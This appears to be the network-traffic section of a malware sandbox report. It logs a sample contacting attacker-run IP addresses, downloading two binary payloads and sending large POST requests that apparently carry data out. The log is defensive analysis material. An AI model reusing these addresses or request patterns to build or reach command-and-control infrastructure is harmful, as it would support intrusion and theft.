Home
Result
Report
Detail Analysis

Network Analysis

Download pcap

Hosts 4 DNS 0 TCP 3 UDP 7 HTTP(S) 5 ICMP 0 IRC 0 Suricata Snort

IP Address	Status	Action
164.124.101.2	Active	Moloch
185.163.204.212	Active	Moloch
185.163.204.22	Active	Moloch
52.78.231.108	Active	Moloch

Name	Response	Post-Analysis Lookup
No hosts contacted.

TCP Requests

UDP Requests

GET 200 http://185.163.204.22/bin1axsec

REQUEST

GET /bin1axsec HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Host: 185.163.204.22

RESPONSE

HTTP/1.1 200 OK Server: nginx Date: Tue, 18 Jan 2022 01:43:25 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: stel_ssid=e06a9f066abe7d30e5_2840555539476560237; expires=Wed, 19 Jan 2022 01:43:25 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store Strict-Transport-Security: max-age=35768000 Access-Control-Allow-Origin: *

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

POST 200 http://185.163.204.212/

REQUEST

POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Content-Length: 128 Host: 185.163.204.212

RESPONSE

HTTP/1.1 200 OK Server: nginx Date: Tue, 18 Jan 2022 01:43:26 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Access-Control-Allow-Origin: *

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

GET 200 http://185.163.204.212//l/f/8maa330BZ2GIX1a3k6gn/8eb5643c4817d16920c26a3a936412853a3b10a5

REQUEST

GET //l/f/8maa330BZ2GIX1a3k6gn/8eb5643c4817d16920c26a3a936412853a3b10a5 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.163.204.212

RESPONSE

HTTP/1.1 200 OK Server: nginx Date: Tue, 18 Jan 2022 01:43:27 GMT Content-Type: application/octet-stream Content-Length: 916735 Connection: keep-alive Last-Modified: Fri, 07 Jan 2022 23:09:58 GMT ETag: "61d8c846-dfcff" Accept-Ranges: bytes

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

GET 200 http://185.163.204.212//l/f/8maa330BZ2GIX1a3k6gn/f4a3f3c357b3c7193f467f617873a1c04ff25519

REQUEST

GET //l/f/8maa330BZ2GIX1a3k6gn/f4a3f3c357b3c7193f467f617873a1c04ff25519 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.163.204.212

RESPONSE

HTTP/1.1 200 OK Server: nginx Date: Tue, 18 Jan 2022 01:43:33 GMT Content-Type: application/octet-stream Content-Length: 2828315 Connection: keep-alive Last-Modified: Fri, 07 Jan 2022 23:09:57 GMT ETag: "61d8c845-2b281b" Accept-Ranges: bytes

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

POST 200 http://185.163.204.212/

REQUEST

POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV Content-Length: 1902746 Host: 185.163.204.212

RESPONSE

HTTP/1.1 200 OK Server: nginx Date: Tue, 18 Jan 2022 01:44:11 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Access-Control-Allow-Origin: *

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts